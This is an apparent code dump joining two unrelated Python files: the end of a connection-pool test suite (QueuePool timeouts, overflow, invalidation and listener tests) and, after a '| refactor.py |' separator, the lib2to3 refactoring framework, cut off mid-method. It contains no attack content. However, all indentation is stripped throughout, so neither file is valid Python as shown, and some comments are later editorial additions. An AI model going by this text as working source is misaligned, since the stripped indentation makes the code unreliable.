def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print('Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup)
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError:
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
def creator():
time.sleep(.05)
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join()
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
@testing.requires.threading_with_mock
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(.1)
conn.close()
c1 = p.connect()
c2 = p.connect()
for i in range(2):
t = threading.Thread(target=waiter,
args=(p, timeout, max_overflow))
t.setDaemon(True) # so the tests don't hang if this fails
t.start()
c1.invalidate()
c2.invalidate()
p2 = p._replace()
time.sleep(.2)
eq_(len(success), 12, "successes: %s" % success)
@testing.requires.threading_with_mock
@testing.requires.python26
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator1():
canary.append(1)
return dbapi.connect()
def creator2():
canary.append(2)
return dbapi.connect()
p1 = pool.QueuePool(creator=creator1,
pool_size=1, timeout=None,
max_overflow=0)
p2 = pool.QueuePool(creator=creator2,
pool_size=1, timeout=None,
max_overflow=-1)
def waiter(p):
conn = p.connect()
time.sleep(.5)
conn.close()
c1 = p1.connect()
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.setDaemon(True)
t.start()
time.sleep(.5)
eq_(canary, [1])
p1._pool.abort(p2)
time.sleep(1)
eq_(canary, [1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=dbapi.connect,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
pool._refs.clear()
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0])
)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter, i.e. it's not true
reference counting."""
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = self._queuepool_fixture(pool_size=1,
max_overflow=0,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises(
Exception,
p.connect
)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = p.connect()
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = p.connect()
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = p.connect()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1,
max_overflow=2, recycle=1)
c1 = p.connect()
c1.close()
time.sleep(1)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1, max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect()
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
@testing.requires.threading_with_mock
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect()
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls([
call('foo.db'),
call('foo.db')],
any_order=True)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
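# Editor's sketch (illustrative only, not part of the original suite): the core
# QueuePool behaviour exercised throughout these tests reduces to
#   dbapi = MockDBAPI()
#   p = pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
#                      pool_size=3, max_overflow=2)
#   c = p.connect()    # checks a connection out
#   c.close()          # returns it to the pool (firing reset/checkin events)
#   p.dispose()        # closes the pooled connections
#   p2 = p.recreate()  # new empty pool with the same configuration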
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
from __future__ import with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import os
import sys
import logging
import operator
import collections
import io
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_utils as bu
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatterns must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leaves
if pat.type is None:
raise _EveryNode
return set([pat.type])
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
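# Illustrative example (editor's addition): for the standard fixer package this
# returns fully qualified module names, e.g.
#   get_fixers_from_package("lib2to3.fixes")
#   -> ["lib2to3.fixes.fix_apply", "lib2to3.fixes.fix_basestring", ...]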
def _identity(obj):
return obj
if sys.version_info < (3, 0):
import codecs
_open_with_encoding = codecs.open
# codecs.open doesn't translate newlines sadly.
def _from_system_newlines(input):
return input.replace("\r\n", "\n")
def _to_system_newlines(input):
if os.linesep != "\n":
return input.replace("\n", os.linesep)
else:
return input
else:
_open_with_encoding = open
_from_system_newlines = _identity
_to_system_newlines = _identity
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset((token.NEWLINE, tokenize.NL, token.COMMENT))
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
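# Illustrative example (editor's addition): for source that begins with
#   from __future__ import print_function, unicode_literals
# _detect_future_features() returns frozenset({'print_function', 'unicode_literals'});
# the scan stops at the first non-__future__ statement after any docstring.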
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name))
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping implicit fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except IOError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with _open_with_encoding(filename, "r", encoding=encoding) as f:
return _from_system_newlines(f.read()), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
# sort by depth; apply fixers from the bottom of the AST to the top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
# some fixers (e.g. fix_imports) must be applied
# with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except AssertionError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if fxr not in match_set:
match_set[fxr] = []
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
f = _open_with_encoding(filename, "w", encoding=encoding)
except os.error as err:
self.log_error("Can't create %s: %s", filename, err)
return
try:
f.write(_to_system_newlines(new_text))
except os.error as err:
self.log_error("Can't write %s: %s", filename, err)
finally:
f.close()
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(True):
